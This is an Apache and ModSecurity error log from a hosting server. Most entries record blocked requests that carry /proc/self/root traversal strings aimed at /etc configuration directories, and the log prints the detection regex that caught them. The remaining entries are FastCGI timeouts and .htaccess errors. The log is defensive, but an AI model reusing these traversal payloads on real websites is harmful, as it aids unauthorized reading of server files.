[Thu Mar 19 10:21:10.562193 2026] [:error] [pid 19093:tid 140411599251200] [client 74.7.243.128:54000] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv4Rl_V7PWP6ixUYl64cAAAApE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:21:17.105858 2026] [proxy_fcgi:error] [pid 14269:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:58246] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:21:19.079657 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.243.128:54008] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv4T-oXxyEfFpUF8f8K0gAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:21:25.364437 2026] [:error] [pid 14269:tid 140411699963648] [client 74.7.243.128:44248] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv4VQbLMZ6AikZjR9VZ1wAAAAU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:21:31.915960 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.243.128:45814] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv4W9a6ubjKNq_cu4ZNWAAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:21:39.176940 2026] [proxy_fcgi:error] [pid 26799:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:58798] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:21:40.571272 2026] [:error] [pid 17653:tid 140411599251200] [client 74.7.243.128:39850] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv4ZMdf6f5d65gmYZRyhAAAAtE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:21:56.458932 2026] [:error] [pid 14269:tid 140411683178240] [client 74.7.243.128:39854] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv4dAbLMZ6AikZjR9VZ4QAAAAc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:22:01.125884 2026] [proxy_fcgi:error] [pid 17653:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:59274] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:22:08.099404 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.243.128:47120] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv4gNa6ubjKNq_cu4ZNZQAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:22:11.893819 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.243.128:47120] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv4g9a6ubjKNq_cu4ZNZgAAA0Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:22:21.334361 2026] [:error] [pid 14269:tid 140411632822016] [client 74.7.243.128:47050] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv4jQbLMZ6AikZjR9VZ6QAAAA0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:22:24.136170 2026] [proxy_fcgi:error] [pid 30077:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:59840] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:22:26.111419 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.243.128:47054] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv4ksdf6f5d65gmYZRyngAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:22:31.156489 2026] [:error] [pid 14269:tid 140411548894976] [client 74.7.243.128:51568] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv4lgbLMZ6AikZjR9VZ6wAAABc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:22:34.835376 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.243.128:51580] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv4mgkwaGbbGflqUZC8DwAAAMU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:22:38.187962 2026] [:error] [pid 17887:tid 140411599251200] [client 74.7.243.128:51580] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv4nAkwaGbbGflqUZC8EQAAANE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:22:45.121982 2026] [proxy_fcgi:error] [pid 14269:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:60352] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:23:07.149824 2026] [proxy_fcgi:error] [pid 30077:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:60932] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:23:15.703426 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.243.128:42850] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv4w8df6f5d65gmYZRyywAAAtA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:23:29.104514 2026] [proxy_fcgi:error] [pid 26799:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:33204] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:23:36.796106 2026] [:error] [pid 19093:tid 140411565680384] [client 74.7.243.128:33246] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv42F_V7PWP6ixUYl64rgAAApU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 10:23:39.236357 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.243.128:47464] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv42_u8EFLIOrSqIpuhfAAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 10:23:41.349687 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.243.128:42336] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv43cdf6f5d65gmYZRy0gAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 10:23:41.561219 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.243.128:42336] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv43cdf6f5d65gmYZRy0wAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 10:23:43.715456 2026] [core:alert] [pid 17653:tid 140411708356352] [client 57.141.18.14:35120] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 10:23:44.655497 2026] [:error] [pid 27293:tid 140411582465792] [client 74.7.243.128:42350] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv44P-YZRR_7pZ7nDKIXwAAA9M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 10:23:48.149689 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.243.128:42356] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv45OyqAr6etmhZHNpdmAAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:23:53.137789 2026] [proxy_fcgi:error] [pid 17653:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:33724] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:23:53.524381 2026] [:error] [pid 27293:tid 140411641214720] [client 74.7.243.128:55484] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv46f-YZRR_7pZ7nDKIYQAAA8w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:24:08.745117 2026] [core:alert] [pid 27403:tid 140411624429312] [client 57.141.18.16:35742] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 10:24:10.633120 2026] [:error] [pid 17653:tid 140411590858496] [client 74.7.243.128:55494] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv4-sdf6f5d65gmYZRy6QAAAtI"], referer: 